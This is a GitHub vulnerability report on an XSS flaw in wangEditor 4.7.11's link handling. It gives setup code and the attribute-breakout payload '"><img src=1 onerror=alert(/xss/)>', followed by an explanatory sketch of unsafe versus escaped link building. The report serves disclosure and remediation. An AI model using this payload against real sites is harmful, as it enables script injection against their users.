There is an XSS vulnerability at the link  #3870

Closed
@wahaha1573

Description

bug

XSS vulnerability

wangEditor version

V4.7.11

Can the official website reproduce the loopholes?

yes

Reproduction steps

1. Use the following code to build the environment, or use the official demo website (https://codepen.io/xiaokyo-the-bold/pen/ZEpWByR)

```html
<script type="text/javascript" src="https://unpkg.com/wangeditor/dist/wangEditor.min.js"></script>
<span class="col-lg-8" id="editor"></span>
<script type="text/javascript">
  const E = window.wangEditor
  const editor = new E('#editor')
  editor.create()
</script>
```

2. Visit this HTML page and do the following

payload:

```html
"><img src=1 onerror=alert(/xss/)>
```
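The payload in the report closes a quoted attribute value and starts a new element. The sketch below is an added example, not wangEditor's code: it assumes the link markup is built by string concatenation (the page does not show the editor's implementation) and contrasts that pattern with a builder that allow-lists URL schemes and escapes every interpolated value. All function names are hypothetical.

```javascript
// Added illustration; helper names are hypothetical, not wangEditor's API.

// Assumed vulnerable pattern: user input concatenated straight into markup.
function buildLinkUnsafe(url, text) {
  return '<a href="' + url + '" target="_blank">' + text + '</a>';
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape characters that can end an attribute value or open a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Return a normalized absolute URL, or null if it does not parse or uses a
// scheme outside the allow-list (javascript:, data:, ...). Relative URLs are
// rejected in this sketch.
function safeUrl(raw) {
  let parsed;
  try {
    parsed = new URL(String(raw).trim());
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Hardened builder: validate the URL, then escape both href and link text.
// When the URL is rejected, only the escaped text is emitted, with no anchor.
function buildLinkSafe(url, text) {
  const href = safeUrl(url);
  if (href === null) return escapeHtml(text);
  return '<a href="' + escapeHtml(href) +
    '" target="_blank" rel="noopener noreferrer">' + escapeHtml(text) + '</a>';
}

// Payload as given in the report.
const REPORTED_PAYLOAD = '"><img src=1 onerror=alert(/xss/)>';

console.log(buildLinkUnsafe(REPORTED_PAYLOAD, 'link')); // attribute breakout survives
console.log(buildLinkSafe(REPORTED_PAYLOAD, REPORTED_PAYLOAD)); // inert text only
```

When the editor's stored HTML is rendered elsewhere, the same validation has to run at that rendering point too, since content can reach the store without passing through the editor UI.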
